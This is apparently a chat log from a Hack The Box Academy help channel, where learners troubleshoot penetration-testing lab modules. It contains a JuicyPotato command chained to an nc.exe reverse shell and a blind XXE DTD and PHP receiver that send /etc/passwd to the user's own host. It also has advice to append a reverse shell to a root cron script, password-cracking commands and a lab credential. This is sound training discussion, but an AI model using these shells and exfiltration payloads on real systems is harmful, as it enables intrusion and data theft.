high/medium/low with a "recommended" best

Ngl dont pay attention too much to it until I have a connection problem

Just pick everything that looks fast

It’s too slow it’s not working

🫠

Check your internet connection

Mmmm ok thanks a lot

Windows Evasion Techniques > Static Analysis:

Im bypassing AV according to log.txt but the flag isn't generating

same problem

I think they're very specific testcases

I'm retesting mine now

like the code inside really matters

Module : Introduction to Windows Evasion Techniques
Section : Static Analysis

the problem is that the flag is not generated

i don't know if it really matters because i am trying from 2 days
since i am able to bypass the static , the flag should be generated

Looking at the previous responses about this issue

it seems like the code is the problem

are you using c#?

mhmm

And I'm deving "locally"

Thanks! But when you send requests with that content type, you can't see the output because it's not blocked by the WAF and it doesn't appear in the logs. Am I wrong? How can I see the response to my payload?

Hi

That is not the bypass message.

it hasn't been 24 hrs you get to cater illegal bs like that

lol

I've never really seen a good AI detector. Put the American constitution in there and it'll be like 98%+

i guess the founding fathers used chatgpt

https://undetectable.ai/

Also I have to delete that as you're posting content above t0

AI checkers dont even make sense ngl

lol

they detect predictability

someone pls help its been hours this POtato is not cooking....... windows priv esc assesment part 1....... here is what im trying can someone help......C:\Users\Public\JuicyPotato.exe -l 1337 -t * -p "C:\Windows\System32\cmd.exe" -c "{42CBFAA7-A4A7-47BB-B422-BD10E9D02700}" && C:\Users\Public\nc.exe -e cmd.exe 10.10.1x.x 1337

it says it works but creates no shell

why are you using &&

make it run nc not cmd

the && is a whole new command outside of juicypotato.exe

pretty sure you need to include the command you want juicy potato to execute as arguments for the potato exploit itself, not a second command unrelated to it

thanks

correct

Hi everyone, im on the Active directory enumeration module and im following the tutorial for crackmapexec asreproast, however when i follow the instructions I receive this error message. Has anyone experienced this before?

crackmapexec ldap dc01.inlanefreight.htb -u users.txt -p '' --asreproast asreproast.out --verbose

Error resolving hostname dc01.inlanefreight.htb

Do you have dc01.inlanefreight.htb in your /etc/hosts file pointing to the target, and can you ping the target?

You must be connected to the VPN and put the host in your /etc/hosts file, those are the two primary reasons why you wouldn't be able to reach it. If you're not using the VPN you can use the pwnbox instead.

there will be new modules on the AI path ?

I believe they have said they are going to add more modules, yes.

nice hopefully they keep it on tier 2

Im using the pwnbox and i have the entry
[TARGETMACHINEIP] dc01.inlanefreight.htb

your error says you can't resolve the host, so i would double check the configuration in /etc/hosts

I think you also need the base domain

e.g
(TARGET IP) inlanefreight.htb dc01.inlanefreight.htb

Ah yep that was it. Thank you both 🙂

Anyone have a reason as to why the shell script for installing odat does not install odat?

./odat.py results in "no such directory hurrdeedurr"

you could try manually running each step to see where it fails

or maybe the people who are paid to write this shit maybe should like uhhh I dont know maybe keep on top of these things? for their paid service?

because im not seeing any indication of installation failure

worked for me

well thats great good for you

are you running it on a vm? maybe try the pwnbox if so

oh i think this is that pycryptodome issue i saw someone talking about

feel free to post in #1234357888114364508 if you believe something can be corrected

also sounds like you didn't cd into odat

I attempted to the directory was not even made.

Does anyone actually build their own notes based on HTB Modules and Paths or do you just use alternate resources while you are going through the assessments?

most definitely take notes.

Anyone I can dm for File upload skills assessment? I am having issues with it.

you could DM me

Question... i am doing the module Information Gathering - Web Edition - Page 8 - DNS Zone Transfers

When i do a dig -x on the target ip provided i am not able to get the domain which would have allowed to later look for the ns records.
I understand the issue might be due to the ip being an internal ip.

How would you go about looking for the domain or ns records for internal ip

`[★]$ dig -x 10.129.156.204

; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> -x 10.129.156.204
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 19260
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;204.156.129.10.in-addr.arpa. IN PTR

;; Query time: 3 msec
;; SERVER: 1.1.1.1#53(1.1.1.1) (UDP)
;; WHEN: Tue Mar 11 21:24:12 CDT 2025
;; MSG SIZE rcvd: 56`

Just curious because these modules take a lot of time to take notes on, and with an assessment coming up, I’m looking for a quicker way to figure out the right approach when I’m unsure what method to use. Any tips on making this process more efficient?

what do you mean assessment coming up? CPTS is go at your own pace. everyone is different for learning, i think adult learners do better if they are hands on. writing your own notes and commands etc helps with memory retention as well, but ultimately it's going to be what works best for you taking notes. you don't want to speed run through it, you really need to understand the content.

you need to tell dig what ip to use as the dns @ip see the examples in the section, they should show using that syntax

The fact that it's an "internal" ip shouldn't matter if you're connected to the VPN or using the pwnbox

they likely used dig without specifying nameserver for it to search, so it defaults to public

bro still no usernames from yesterday 😭

lab : https://academy.hackthebox.com/module/116/section/1173

told you yesterday how to fix

you need to adjust the timeout

bro it fixed man

your and mine time is different

?

everyone's time is relative

oh u say timeout i thinking u say fix u machine time, lol

bro how to specify timeout in this tool , i see help their is no such option.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

Well better get to reading it then

read what ?

Read the manual

reading the options

-w n damn .

I need help with Password Attacks , Pass the Hash, Q4 with davids hash, I passed the hash with mimikatz, but I keep opening a new session as administrator and not as David

how do i access the shared folder?

like there is no DC shares, i feel like this box is broken

how to clear database of bloodhound ...??

nah this is crazy, ive tried everything and there is no share DC01

Hi guys. Need some really specific help in something concerning the printnightmare vuln in the AD enum and attacks module. Please if someone is available in dm just let me know. Thanks.

Depends on the version.
Normal:

• Go to the panel on the top left
• Click on the left most tab
• scroll all the way down
  CE
• Click the settings tab
• Look for it on the left side bar

0xW1LD do you know how to solve the pass the hash question?

No, haven't touched that module

anyone has issues with spawning academy targets ?

nvm it works now

This living off the land section of AD can't be absorbed within just a day. There's so much info lol

Follow the first image from the very top of the section

You get partial access, so that’s why you’re still admin but you get access to the shared folder

if anyone could help with intro to whitebox command execution section that would be nice.

DM

Can someone help me on this module : Coercing Attacks & Unconstrained Delegation

How do I get into BOb again without an IP

There are IPs for the machines on Overview and Lab Environment section

Yes but it said some vary on module

Wait which one was Bob lol

Maybe Bob!=WS001

I think i was just overtired I think i can get it now

holy f , finished the Pass the hash section

that one was brutal

Aye why some people be having ruby gold and all them badges someone explain

Hi,
Can I track my progress on HTB Academy using the Student ID, and how?
I saw that it was possible via an API. How can we get an API token and documentation ?

From the third party meaning from the employer, I guess..

I tried but reach dead end as well, so i concluded it’s for enterprise user. I may be wrong idk

Get some colour to your name by reading #welcome and follow the instructions there

for me it kept giving me the error 429 iirc

gave it like half an hour and it gave the same error

mightve just been an off day but it was the last thing i needed to finish the module and got on my nerves

Code 429: Too many requests

I'm trying to redo the Blind Data Exfiltration section to test a few things out since I was having trouble with the Skills Assessment at the end of the module. I remember this working on my first or second try when I initially did this section, but now that I've gone back I can't get the data from /etc/passwd or the flag at the end of the section to output into my terminal. I extracted the data using XXEInjection, but that tool isn't working in the skills assessment, so I'm currently trying to figure out what I'm doing wrong with the PHP server method.

My .dtd file:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % oob "<!ENTITY content SYSTEM 'http://MY_IP:8000/?content=%file;'>">

My request to the web app:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE email [ <!ENTITY % remote SYSTEM "http://MY_IP:8000/xxe.dtd"> %remote; %oob; ]> <root>%content; </root>

The output I receive on my terminal:
[Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 Accepted [Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 [200]: GET /xxe.dtd [Wed Mar 12 05:33:23 2025] 10.129.142.203:36428 Closing

According to the section, my output should be:

`10.10.14.16:46256 Accepted
10.10.14.16:46256 [200]: (null) /xxe.dtd
10.10.14.16:46256 Closing
10.10.14.16:46258 Accepted

root: x :0:0:root:/root:/bin/bash
daemon: x :1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin: x :2:2:bin:/bin:/usr/sbin/nologin
...SNIP...`

My index.php and xxe.dtd file are both in the same directory as the PHP server I'm opening. I'm not really sure what I could possibly be doing different than what I did the other day when it worked.

Also, here is my index.php file:
`<?php

if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}

?>`

@dry falcon - do not spoil credentials. Just ask a question with a reference to a module and section.

i added **** in it

I am going back through CPTS modules and I could have sworn there was a section on ntlmrelayx.py . Am I dreaming or was it removed ?

If I remember right it was removed when they released the NTLM Relay Attacks module

[25][smtp] host: 10.123 login: abc@try.htb password:mypass
how to access all mails ?? using these id:pass
is it ok

Read the second part too - still missing the module and section

https://academy.hackthebox.com/module/116/section/1173
here is it .

Name the module and section please. Clicking a link on mobile is a pain in the ass.

done

the hack the box domain caught me up a bit then

was a skill issue 🤣

I thought the syntax was
dig @<nameserver> <domain> AXFR

isnt @<nameserver> supposed to be something starting with ns instead of an ip.

that was the example that they had dig axfr @nsztm1.digi.ninja zonetransfer.me

Generally nameservers are named ns~~~ to identify that they are name servers however you can still use the ip

why command are not working 😭 and when i run in pwnbox it work what the hell . 😭 😩

https://academy.hackthebox.com/module/116/section/1169
Attacking SQL Databases

Ad Enumeration module with petitpotam

ok I'm at a brick wall.. please help.

I'm doing the web attacks skills assessment and I have escalated privileges and have currently tried everything I can think of to parse XML using XXE to get some sort of info or the flag. I'm receiving a null output with many various payloads rather than the string, and I've identified how the payload needs to be constructed to receive the null output, but I can't receive any info in the output. I'm assuming the payload is executing properly, but I can't get any oob attacks to work to grab any files.

for password attacks - I'm on password reuse / password default

For the sql question - it mentions to use the previous credentials to find the sql login... Just want to make sure I'm not going crazy, does it want me to mutate the last questions credentials for the login? I ran an nmap and don't even see sql running... A bit confused here and nudge would be great

i assume you have already checked the xxe and its working with a plain text

correct

I would check if the previous creds work for any external services first.

hi all, getting terrible latency to academy. issue persists on both EU and US VPNs

anyone aware of any fixes? VPN is using TCP

This is EU UDP

did you double check the syntax? are you dumping on base64?

as the file you are trying to get might be crushing the xml, if I did not explain myself properly

id use a wrapper instead

ok thank you very much @waxen totem . I did not know. 👍

I tried that, and it didn't work, but I actually finally figured it out.

what was it?

I haven't solved it, but I figured out my problem. I've been adding % instead of & at the beginning of my entity references for the past few hours 🙃 At least I can start to figure out how to solve this

well damn

Hi all, I am current attempting AD Enumeration & Attacks - Skills Assessment Part II

I have compromise the MSSQL server and exploited it. I am attempting to extract the hash using Mimikatz, but the hash provided to me is wrong. I used netexec commands to exploit + obtain reverse shell + upload necessary files.

damn i feel really dumb. I probably would've benefited from just sleeping on it 😂 live and learn I guess

% is for other case

when u cant join external and internal entity's

plus u dont have to feel dumb, its studying 😛

true. Thanks

also make sure u make good notes

helps alot

taking breaks sometimes is also great

Oh yeah my notebook has been filling up. I'm trying my best to keep them succinct, but there's so much info it can be hard sometimes. My note taking has improved somewhat so I'm sure I'll get better at that as time goes on, too

what are u using for note taking

KeepNote

oh thats not online

i use gitbook way more friendly for the eyes 😛

word I'll look into that

ill dm you screenshot of my notes

how it looks

👍 thank you

your welcome

if I'm building with the vs studio and it says it needs the built dll with it how do i change config to only need the exe itself

Hello everyone

hi @rotund oak

Anyone done AD trust attacks recently? For Cross Forest attacks when SSH over to the target the shell isn't stable, when the shell gets to the bottom of the screen it doesn't scroll up and the next command just overwites the bottom line, the buffer is set to 9999 and won't let me change.

same problem here. If you get the answer please let me know, I already used mimikatz, msfconsole and lazagne nothing worked

Hi all! I'm doing the windows evasion techniques module and I'm stuck at the LOLBAS: RunDll32 section. When I compile I get the error CS5001 "Program does not contain a static Main method suitable for an entry point". Does anyone know what I can do?

I can check the hash and let you know if it is indeed wrong. Can send a DM.

You can DM if you'd like. You probably just need to do a little more enumeration.

Just DM

we don't do that here lol

I wanted to ask a question
Right now in the active directory enumeration & attacks
I find my self understanding everything and not taking much time in the questions given
however i can't really solve anything till i copy and paste the commands like i mostly don't write anything
is that okay or should i be able to write the commands myself?

you should be able to apply the concepts and skills you've learned in order to solve the exercises and the skills assessments

you are not going to remember commands most of the time so you can use a cheat sheet

there should be one provided in that module

I would say that if you have to copy paste if it's a basic/simple command, then you're likely not understanding the command

at some point you should be able to type some basic commands but you're not going to remember the long commands

or maybe you will

Well yeah it's just frame of reference type of thing

like setting up an SMB server for transferring files in your current dir -- sudo smbserver.py -smb2support share .

If you know which command/one-liner you need, sure

But if you need to blind copy/paste until it works, no

Greetings hat

Hi

hi

prime_eagle you can quit DMing me.

Check your box

Read the #rules dming without consent is a quick way to get yourself booted from the server

Hello

Thank you marcielee and calculac0re

Is there a known issue with Windows Targets? Mine comes online but then gets unresponsive as I log in using xfreerdp

hello everyone,
I am an newbie learner from HTB, and i am confused in choosing modules.
i am currently using linux as my main OS.
please help!

choose a job role path instead @rustic sage

i am thinking of taking linux fundamentals

you can try finishing all Tier 0 and I modules before enrolling into a job role path

or choosing a skill path

ok

i will do that

Take your time

thank you, for helping me

linux fundamentals is the pre-req to pentester

the more you understand, the easier it becomes for the later modules

no problem, welcome

i think skill path will boost my resume

Black screen? Press enter

Hey is anyone else having a hard time fuzzing the /admin directory using burp in the "Using web proxies" module?

what do you want to work towards?

i always wanted to become an hacker (offensive)

thats my dream

what specific area of pentesting do you want to focus on

web, network, ...

network

then you should probably start with the Information Security Foundations skill path, then you can pivot to the Penetration Tester job role path

ok, i will see that
thank u for giving ur time

can anyone assist with hasc crak for Windows priv esc assessment II? have the hash but cant find a wordlist when using hashcat.

Can just go with rockyou, but if its something you can just PTH with, why not just PTH?

sometimes there's a wordlist provided in the 'resource' tab

Not every hash can be cracked.
You may have to use the hash in another way

After escalating privileges retrieve the NTLM hash for this user and crack it offline. Submit the cleartext password for this account.

Yeah just try rockyou, unless there is a provided wordlist in resources like Uncommon mentioned.

Anybody seen this? Tried on two VMs but getting same issue 🤔 reset the lab a few times too

Hi guys for Pass the Ticket Linux, there are 2 krb5 tickets for julio, one of them is expired and the other one, when I try copying it, it says the file doesnt exist, so I'm kinda lost tbh

have you tried cracking it on a website

there are websites

all them require registration

Not sure but sounds like the path is wrong if it can't find a file, checked cases in the path?

yeah it was totally wrong, I fixed it

it respawned, the name of the file into something else, when i did ls -la /tmp again

Yeah would have caught me too ha

find /usr/share/seclists/Passwords/ -type f -name "*.txt" -exec cat {} + > combined_wordlist.txt

hashcat -m 1000 -a 0 admin_hash.txt combined_wordlist.txt --force

still nothing....therew everywordlist in seclist directory and subdirectory at it

What lab you doing?

@fresh wedge

windows prive esc assesment part II

no actually im stupid, so the wrong one, is expired but when I use it and then do ls -la /tmp file, another ticket under julio arrives, but if I respawn target, the command shows the expired one and another ticket which is basically has no credentials in it

You can DM.

I'm so confused

@tired atlas what HTB path is it in?

Pass the Ticket Linux, under Password Attacks

I'll show you what i mean here

the HRJDUX one I highlighted in white is expired

the one under it is invalid

Ah I've not done that module, thought it might be in the CAPE path. Are you copying them from a windows box? They should have a .ccache extension I think on Linux?

That's probably considered a spoiler.

but they dont

What are you running/trying to do? If they are from a windows box you'll have to convert them

They'll be steps in the module if you do, sometimes the SA mix different parts you've been shown before

its from a linux box, and I'm trying to get that ccache file and use it to impersonate Julio

were there no other files or anything in the lsass?

doesnt look like youre in the /root directory

oh snap

even if I do go to the root directory, this shows up, for the other ticket that I want to use

did it get replaced?

how do I know that

by checking tmp for the file

nope cant cat it

then it changed

OH MY LORD

what do i do then

got it

I just used the expired ticket, then ls -la /tmp, to find new changed ticket and that worked woohoo

hi

File Upload Attacks
Page 11
Skills Assessment - File Upload Attacks
Skills Assessment - File Upload Attacks , I tried to find the hidden directory of the file uploaded with burp suit but could not find a way to activate the shell , can anyone help?

smbclient -U bob ////10.129.13.178//users
password for {WORKGROUP/bob}: "Welcome1"
do_connect: Connection to failed (Error NT_STATUS_NOT_FOUND)

Service Scanning

Probably too many forward slashes

Instead use backward slashes

Too many forward slashes \\\\ is equivalent to //

@coral plank this channel isn't for help with ctfs, if it's active then you're just gonna have to wait

This channel is for help with htb academy modules

@fathom pendant I am literally sorry, I won't do it again.

I got 2 hours and got no hint to get the flag :/

Try to exploit the upload form to read the flag found at the root directory "/".

@nimble scroll you could DM me for the file upload attacks skills assessment.

thank you for the answer 👍

somebody can help me in dante prolab

facing a breaker while pivoting through chisel

You need to use the vpn

https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access

#1263635449335910531 if you dont have access get verified, instructions --> #welcome

How do I connect to BoB in windows attack and defense challenge : PKIesc1

I am only given 1 IP and that’s for Kali

The static IP for WS001(Bob?) doesn’t work for me

connect to kali then connect to bob through kali

@hallow kiln no It was Just completely Frozen, got It to work After 2 resets

in hydra, i can do : ftp://<IP>
or i do: <IP> ftp , correct ?

protocol://ip works

otherwise you'd specify the protocol directly after
hydra ftp ip

yes thank you

also , can someone provide me the solution for this ? man i am brute forcing all services found on the host but cant get the password -_-

and the list is 7k lines long

its Password Mutations in Password attacks

meh its okay
i will just continue And let the bruteforce run by itself

did you try using a mutated password list as instructed by the module?

Yes

did you mutate the password.list with the given custom.rule?

as in the one from resources, not the one from the reading

And also ; i am bruting || FTP ||

Yes I ran the proper command

the total mutated list should be ~94k words, not ~7k

Sorry I typed wrong

64 threads breaks a lot

try using a little less

yes
I also remember that ssh attacks are really slow
I will go to like 8 threads ?

but this module also exercises patience, it's one of the few that breaks the "if it's not cracked in 5 minutes, you're doing something wrong"

48 was the sweet spot for me

i will note that down on my cheat sheet

i believe the guide uses like 52

i will read it again lets see

i hate brute forcing

guide == annual perk walkthrough

not the direct reading

i think on the machine nibbles i got banned when i tried to brute force 🤣

after that i didn't like it

you didn't need to brute nibbles

Yes just guess it, but how -_-

i really gone through all xml files

no password

I have a problem in nibbles, i accidentally messed the monitor.sh script up because i forgot to adjust the command to my ip and then i tried to vim it to get it right but something went wrong there.

you cannot edit the file anymore ?

I can but there is already a line for the reverse shell with the wrong ip before the one with my ip

will that not matter if i just add the correc tline at the end?

run sudo -l
make sure the path to the sh is correct,

Patience is the solution

and then you can empty the file completely , and run bash -c '#reverse shell here'

As long as the correct line is at the end it won't matter

But dont forget to not delete the first line , so the system knows that its a bash file

Thats not good practice

Allright thank you both!

hmm why? wouldn't it work?

You want as minimal disruption as possible, deleting the whole file would be noticed fast

I was just echo /bin/bash >> monitor.sh to got root access

i see
Just append the reverse shell at the end, you suggest

I am really lucky to be in this community Learning alot

Hello there! Just finished Skill assessments for the Shells module, I have a question about the first host. There are two vectors of entry, and one of them needs credentials, given in the hint about the first host. Is there a way to find those credentials without looking at the hint ? They were not the default ones, so I'm wondering.

Correct, typically deleting client files is out of scope, as well the module also talks about creating a backup of the file

i have a question
Yesterday i tried to try escalate privileges on old sudo, but then it asked me for a password to run the file (it asked the password of the current user) but i didn't have it
How can i see exploits that i can actually use ? is there a way to filter them ?

I think i need to first complete the whole course and then start with ippsec's guides to get the hang of it

Making a backup would be a better choice

Wydm old sudo

for example there is a shell script for privilege escalation for sudo versions between 1.8 and 1.9, this is what i mean

I it’s just a matter of knowing what and where to check

The linux privesc module covers this

But that’s later in the path

Actually, the second host also has a set of credentials in the hint section that I'm not sure how to get another way... :/

Desktop of the jump host

Typically running sudo requires a password, if you don't have the password then assume sudo exploits are out of the question

btw, i got the password now

:) : )

Wow, thank you. Seems like a silly question now.

missing the forest for the trees :)

Since there's a similar file on the PwnBox Desktop with no "task related credentials", I didn't thought those might be different. Will know next time I have to use one though 👌🏻

the credentials on pwnbox is the credentials to log into the pwnbox externally; such as via ssh

pwnbox is independent to the given lab environment

Yeps! It definitely makes sense, I just shortcuted and wondered where was the recon work talked about in the skill assessment intro 🥲😅

Won't make the same mistake I hope!

you're not the first person to completely miss the obvious, since you're so hyped and prepped to just attack the boxes

Definitely yeah. Should have taken more time to assess and recon 🙂 let this be my lesson for the future 🫡👍🏻

there's a few cases in other modules where the important text file is just right there when you rdp in

I would be surprised of the module told you to modify your resolv.conf file, have you tried the normal way with just adding the hosts to /etc/hosts?

Also please make sure not to post content from modules above tier 0

module is asking fot it yes
Sorry, but I really just wanted to show the problem

You can ask without revealing info though. I see that and it worked fine for me, but I didn't use the FQDN just the hostname.

that's what i'm doing with bloodhound
dc ACADEMY-EA-DC01

try without proxychains, the module shows it without, that's the way i did it and it worked

I did without and that's working, but I wanted to do with proxychains because in real Ops I will be using poxycahins

in real ops: it'll depend

in real ops i don't think you'd be pivoting through another attack box

wouldn't you just use the attack box already connected?

i did so to complete the section, but I wanted to know why proxycahins wasn't working
Anyway, I will pass to next section

there's also pivot tools that don't rely on proxychains

like ligolo-ng, and ligolo-mp

it seems like even if we're root we can't use klist on the non-expired ccache file unless it's in the root directory for whatever reason

like it didn't work when i set the env variable to "/tmp/...." but it did when it was "/root/..."

weird

maybe it has to do with the fact that i was the "root" user so i needed to specify my directory (root/) to the env. variable

well nevermind everything i wrote, the location of the file has nothing to do with needing to be in the user's directory

does anyone know why i couldn't export the ccache file's filepath in the KRB5CCNAME environment variable? was it because it was in /tmp?

shouldn't matter too much if it's in /tmp/ did you use the full filepath?

i just killed my pwnbox so i can't check my history but maybe i didn't yeah

but i mean as long as i know the filepath doesn't have to comply to certain rules as long as it's the full filepath i'm fine lol, thanks

in general: best practice for environment variables is full filepaths

all of them till you find it, doesn't take that long

Most of them'll end pretty quickly anyway

Actually Imma save you some time now its not in that list

the answer is in the format of b.a.inlanefreight.htb where a.inlanefreight.htb is one of the subdomains, i suggest doing a dig axfr on the base domain first instead of jumping straight to the list/bruteforce

Okay , thanks alot for the hint , atleast am assured i would'nt wait till eternity.

what machine can i use to practice ADPowerview

do you mean boxes in the lab or a module?

labs like machines for CTF challenges

best to ask in #boxes, if you can't access it you'll need to link your HTB account by following the instructions in #welcome

i don't have access

I said how to get access in the same reply...

@cloud urchin I got it thank you !

Hey, does anyone know why Academy has quite often issues with deploying the target? I have apparently the issue that it deploys forever and I cannot continue :/

Try pressing CTRL+SHIFT+R

I did, it did not help

try spawning it in another browser or changing vpn servers. if you change vpn servers press CTRL+SHIFT+R again before you spawn the target after you connect to the vpn.

I don’t connect to vpn, I usually use the attack box

Another browser also doesn’t work

Okay try changing servers or regions then.

Also, maybe disable any extensions you may have, especially ad blockers.

Also doesn’t work, this is now the 5th time I am facing such an issue, really not cool

Best to reach out to support on the website then.

Yeah but please try to fix that internally also

I'm not HTB staff. Did you try changing servers like I suggested?

Oh apologies haha yeah I did

did you try changing regions after that

which module is it btw?

Yep I did

It’s enterprise htb Windows Attacks and Defense - Kerberoasting

i just tried to spawn the target and was successful

it's very likely something on your end

Hmm Strange

Please try re-asking your question without spoiling content from the module

if I don't put the detail, how can someone help me?

Ok Works now

But now I have another error, I need to connect to the DC and get the following:

People have done the module. You don't need to post content from the module to write a question that contains detail.

First, Windows AD environments can take a good 5 mins to fully spawn even if the target is up. Second you need to wrap your password in quotes.

It’s up for about 40 mins xD and also with quotes I get the same error

Or do I need to put away the eagle?

172.16 is a secondary internal network

there's likely a first target to go through

oh yeah good catch that too

i.e. an attack box --> windows target

Okay and in the windows target then again xfreerdp?

i believe this module has the starting machine 10.129.x.x as a kali box then another internal network target which would be the eagle\bob windows machine

anyone getting blackscreen while rdp(ing) to the target machine (module - ACL Abuse Tactics)

Yes correct I am in the eagle\bob windows machine now

press enter

do whatever the section is detailing you to do

i wasted 10 mins lmaoo. it worked thanks

thinking its loading something maybe

you can search the channel for people with the same issue

it's actually failing to load/draw the corporate AUP screen

Academy should include emulations of networking device cli's in their networking modules including simulating using a faulty serial cable

Yeah that was it, connecting to bob first and from there to the DC my goodness they could have mentioned this….

it's kinda how any AD lab is set up in the modules and was likely mentioned in the beginning

has anyone run into an issue downloading from one of the lab ftp servers?
Specifically the ||"Password Attacks Lab - Easy" module
I can connect with credentials|| via an ftp client but the download is stalled at 0%. I've tried ftp curl wget. I tried switching vpn servers.
I seem to be able to interact with other (non-htb) ftp servers fine.

it worked fine for me previously

try reconnecting to the vpn; sudo killall openvpn and reconnect

Had the same issue. TCP version of the VPN solved it for me

thanks for the suggestions, unfortunately neither ended up working.
i saw this reddit thread reporting the same problem https://www.reddit.com/r/hackthebox/comments/1aevwl0/stalled_ftp_downloaded/ but it had no resolution
perhaps someone else is just hammering the server to the point of DoS? even though I just spun it up? I might have to try later

no one else should be able to hammer your target

so that's just not even in the cards

oh really? I thought we were all on the same network. like the target IPs are just announced to us individually, but still accessible by others. maybe i'm misunderstanding the environment

nope it's similar to the VIP+ package on htb labs; all the private ip range targets are only accessible to you

it would massively hinder learning if other people could mess with your target

ah that makes sense
guess I'll have to troubleshoot this ftp issue further then

Try adjusting the VPN interface(tunX)'s MTU

this affected some people's ssh experience and might affect that as well

I'll try that. i'm at 1500 atm, maybe half it?

Just a hundred in either direction would do wonders

welp,
I went to 1600, didn't work
went to 1400, worked
went back to original 1500, worked????

technology is amazing

help me please

https://tenor.com/view/do-you-have-any-idea-how-little-that-narrows-it-down-that-narrows-it-down-clear-now-its-clear-now-i-understand-now-gif-21256627

that?

Just ask your question instead of asking for help

I'm doing hack the box as a newbie and it tells me to put the Apache version
I put the version and it gives me an incorrect answer

😦

Which module and section?

web requests

HTTP Requests and Responses

that's what it's called

aight so what response are you getting?

I don't know what the X.Y.ZZ format is.

It means just put the version numbers...

I'm an idiot I know XDDDDD

Thank you very much too

I am currently stuck at attacking common services modules attacking database section. I know this shouldn't be that frustating but still I am very annoyed by the last question. here's what I did so far

1. log in with given user with impacket mssqlclient.py
2. got the hash of the service user
3. logged in with mssqlclient.py
4. use the flagDB to select the database

That's it. I can't move forward, every command I type returns nothing. tried the commands from the modules, saw the forums, got some commands, but it just doesn't return anything.
any help would be helpful.

try using impacket-mssqlclient.py

instead of just mssqlclient.py

sometimes it's a bit buggy

Hello

im finishing up the getting started guide of the penetration tester module and im doing the knowledge test. I have experienced some lag using the built in vm so i wanted to try to connect to the vpn and using my own vm.

All i have to do is connect to the vpn and i should be able to reach the host right?

Because i did that and i cant ping the host im given, it says Destination Net Unreachable.

are you running the pwnbox at the same time?

No

did you ctrl-c after connecting bc the "terminal froze"

once you get the Initialization Sequence Completed message, you open a new terminal and leave that one alone

otherwise:

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

OOhhh, i connected my actual laptop to ovpn not just my vm

should i connect inside my vm?

connect from vm instead

while you can do some shenanigans to use host vpn adapter; it's a lot more trouble than it's worth

alright thanks!

Multiple interface bridge dance party

is there a guide anywhere for the right way to connect because i feel like im doing something wrong

nevermind got it!

Anyone done "Trust Account Attack" in AD trust attacks? You are told to ssh via proxychains but my shell stops scrolling when it reaches the bottom of the screen

Does anyone know how to raise a ticket/report an issue with a lab?

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

if it's urgent ^

otherwise #1234357888114364508

Does anyone know why i cant download something from github to my pwnbox from HTB

I can ping sites but i can not curl them or visit them in browser

free pwnbox has limited internet access

ah okay but how are you supposed to get files onto it then?

should be able to git clone

alright, buying a membership after this box then haha

but i never bothered too much with it, had my own vm set up and never thought about it

Someone who managed to pass the skill assessment lab at "Evil-Twin" module?
I need some help about the exercise 😄

for the question
In networking, what term describes the communication pathways (wired or wireless) that connect nodes?
the response is medium ?
but they say no some one can help me pleas

hi, quick question
why is it that my own VM tend to process way slower than the pwnbox provided
for example it only took 5s for hydra to find the password on pwnbox however its taking forever on my own VM
thanks!

hey guys, can someone help me with this question of "Password Reuse/Default Passwords" section of "Password Attacks" module. The question in which we have to find the default 'mysql' creds, I have found this resource 'https://github.com/gauravnarwani97/MySQL-default-credentials/blob/master/default_db_credentials1.txt' containing default creds for mysql then to perform password spraying mysql using hydra 'hydra -C user-password.txt mysql://target's_IP' but the target's 3306 port is not running, even tried the 'mysql_login' module of msfconsole still showing the port is closed also conformed through nmap scan

I don't recall that one exactly but maybe mysql is running locally?

if you're talking about the material or method itself, medium is fine

maybe they want a more specific term

so how do we know the default creds for mysql ? out of the many listed on the website

I'm pretty sure there is a list in the section or a way to get them.

Focus on the service

mysql is running internally; and you can search the list for mysql; they give you a default-cred-cheatsheet to use though

feel free to DM

@plain radish your screenshot contained spoilers

meaning?

should I blured the flag part ?

It contained spoiler info/answers to the module/section

Just be mindful in the future

I will for sure 🙂

Can someone provide a hint for windows privilege escalation - other files assessment please ?

does anyone have any idea why when i use sqlmap, despite being as a dba with file permissions, i still can't read or create files anywhere on the machine?

what are some things i can look for?

https://academy.hackthebox.com/module/147/section/1359

I got the password in cleartext, but when i submit it it says incorrect, but its the password

Q: Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)

wtf

after i manually typed the password it worked

strange

i wanted to ask something if someone is at the very begining of cyber security but has a basic knowledge of software engineering stuff from where should he start (academy, labs, something else) and where exactly in one of those

im doing it soon!! thank you

Has anyone had any issues with chisel and proxychains using crackmapexec?

Can someone provide a nudge for windows privilege escalation - other files lesson assessment please ?

Hi have a HTB account with my student payment but i cant acces the path anb the modules section y already finished my information security information foundations paths and being a student i might have acces to the pentesting path and bug bounty

how many cubes is it to 100% academy

Like in the cme module?

can i get some help withj networking fundamentals module?>

Which protocol manages data routing and delivery across networks?

i've done the whole module but this seem to not accept any syntax

Yes! I'm doing the Stealing hashes CME module where the target machine is already running chisel. I connect to chisel from my end but I cant find 172.16.1.10

└──╼ [★]$ sudo chisel client 10.129.149.117:8080 socks 2025/03/13 10:57:40 client: Connecting to ws://10.129.149.117:8080 2025/03/13 10:57:40 client: tun: proxy#127.0.0.1:1080=>socks: Listening 2025/03/13 10:57:41 client: Connected (Latency 10.605141ms)

┌─[us-academy-1]─[10.10.15.119]─[htb-ac-1524803@htb-wtd4awftne]─[~] └──╼ [★]$ proxychains4 -q crackmapexec smb 172.16.1.10 -u grace -p Inlanefreight01! --shares --verbose [10:58:21] INFO Socket info: host=172.16.1.10, hostname=172.16.1.10, kerberos=False, ipv6=False, connection.py:160 link-local ipv6=False [10:58:25] INFO Failed to create connection object for target 172.16.1.10, exiting...

